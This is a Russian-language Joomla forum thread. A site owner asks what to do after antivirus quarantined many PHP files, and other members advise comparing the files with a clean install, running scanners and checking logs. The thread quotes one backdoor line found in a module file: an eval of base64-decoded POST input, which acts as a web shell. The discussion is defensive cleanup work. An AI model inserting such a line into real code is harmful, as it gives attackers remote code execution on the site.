0 Пользователей и 1 Гость просматривают эту тему.
  • 12 Ответов
  • 748 Просмотров
*

tmpnikl

  • Давно я тут
  • 358
  • 2
начал распаковывать архив скаченный с хоста то половина файлов php попали в карантин с сообщением PHP/Kriptik.AL троянская программа..., в инете кто что пишет, кто пишет, что антивирусники если видят 64 й код, то сразу в карантин, не раскодируя, другие, что лучше удалить..., кто что посоветует?
*

draff

  • Практически профи
  • 2771
  • 171
  • step by step
Стандарт- антивирус выявил файл с вредоносным кодом.Но код может быть вставлен в нормальный скрипт Joomla/расширения. Поэтому, чтобы сохранить работоспособность сайта, нужно каждый файл сравнивать или заменять, с аналогичным из чистого дистра Joomla.
Или если есть опыт, самостоятельно проверять файл и удалять вредоносный код.
*

vipiusss

  • Профи
  • 5594
  • 322
  • Круглая ава-зло!
1.Не качайте с хоста, есть сайты разработчиков.Вот почему вы верите вашему хосту, а потом темы такие создаёте?
2.Отключите НОД и в нотепаге++ в поиске найдите ваш код
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

tmpnikl

  • Давно я тут
  • 358
  • 2
Я проверил ссылку на сайт д.вебом он лайн, чисто, на хосте антивирусником, тоже чисто, и поэтому немного непонятно, какие должны быть правильные действия..., например вытащил из карантина из папки модули файл, в котором написано
<?php eval(base64_decode($_POST['n726b60']));?>
Joomla я скачал с сайта разработчика, и что я должен проверить каждый файл на base64 и раскодировать?
не могу понять, что сделал не так и что надо сделать? т.к. я ничего не откуда не качал кроме Joomla...
PS: Файлов в карантине больше 100 и каждый проверять и раскодировать ..сложновато...
*

aspidy

  • Живу я здесь
  • 1022
  • 54
  • Миграция joomla 1.0-1.5-2.5
Или учится самому http://joomlaforum.ru/index.php?topic=239756.0  как убирать вредоносный код или обращаться к специалистам http://joomlaforum.ru/index.php/topic,282477.0.htmlhttp://joomlaforum.ru/index.php/topic,254903.0.html
Мелкий ремонт. skype poisk-plus
*

tmpnikl

  • Давно я тут
  • 358
  • 2
спасибо, понятно... Остался один вопрос... этот код однозначно вирус, и тогда я занимаюсь лечением... или это может быть закодированным куском программы(сайт работает и пока проблем не вижу)?, и тогда я занимаюсь изучением замены кода...
*

aspidy

  • Живу я здесь
  • 1022
  • 54
  • Миграция joomla 1.0-1.5-2.5
спасибо, понятно... Остался один вопрос... этот код однозначно вирус, и тогда я занимаюсь лечением... или это может быть закодированным куском программы(сайт работает и пока проблем не вижу)?, и тогда я занимаюсь изучением замены кода...
По одной строчке сложно сказать, но скорее всего вирус. Посмотрите логи, htaccess прогоните сканером. Тогда будет более понятно
Мелкий ремонт. skype poisk-plus
*

tmpnikl

  • Давно я тут
  • 358
  • 2
Понял, однозначного ответа нет, надо смотреть...блин, но с каждым ответом появляются другие вопросы...
Если это может быть не вирус, следовательно это может быть кусок кода программы... Каким образом этот код предстал в таком виде?, из-за какого-нибудь конвертера или ещё как...
Надо ли этот код переконвертировать обратно в обычный код и как это делается(хотя бы  ссылку почитать)
Каким сканером прогонять .htaccess(он у меня в таком виде), т.к. артивирусники ничего плохого в нем не увидели, может это Неправильные антивирусники, и для htaccess, нужен особый сканер...вот этот файл, что в нем может быть опасного...
Спойлер
[свернуть]


И последнее какие логи смотреть, в какой папке и на предмет чего.... посмотреть то посмотрю, но какие строчки в нем искать непонятно... что должно вызвать подозрительность при просмотре логов...
во ещё один файл нашел по пути ....ru\administrator\components\com_joomlapack\backup\.htaccess
deny from all
« Последнее редактирование: 14.05.2015, 05:46:03 от tmpnikl »
*

draff

  • Практически профи
  • 2771
  • 171
  • step by step
например вытащил из карантина из папки модули файл, в котором написано
<?php eval(base64_decode($_POST['n726b60']));?>
это вирус.Такой код  в файле дописан или просто файл
*

aspidy

  • Живу я здесь
  • 1022
  • 54
  • Миграция joomla 1.0-1.5-2.5
Сканер http://joomlaforum.ru/index.php/topic,198048.0.html Поищите по форуму сканеров много
Логи смотрите последние, откуда идут подозрительные движения. Например попытка доступа к админ части. Но логи могут не давать полной картины, если взлом произошёл давно.
Под спойлером стандартный htaccess сравнивайте
Спойлер
[свернуть]
Мелкий ремонт. skype poisk-plus
*

tmpnikl

  • Давно я тут
  • 358
  • 2
спасибо, буду смотреть..., а htaccess, что у вас в спулере, что у меня в спулере идентичны...
*

aspidy

  • Живу я здесь
  • 1022
  • 54
  • Миграция joomla 1.0-1.5-2.5
Проверяйте этот \administrator\components\com_joomlapack\backup\.htaccess
Мелкий ремонт. skype poisk-plus
*

tmpnikl

  • Давно я тут
  • 358
  • 2
А что его проверять, выше я написал, что там одна строчка...
deny from all
Запретить всем.... А должно быть так или нет... я не знаю...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться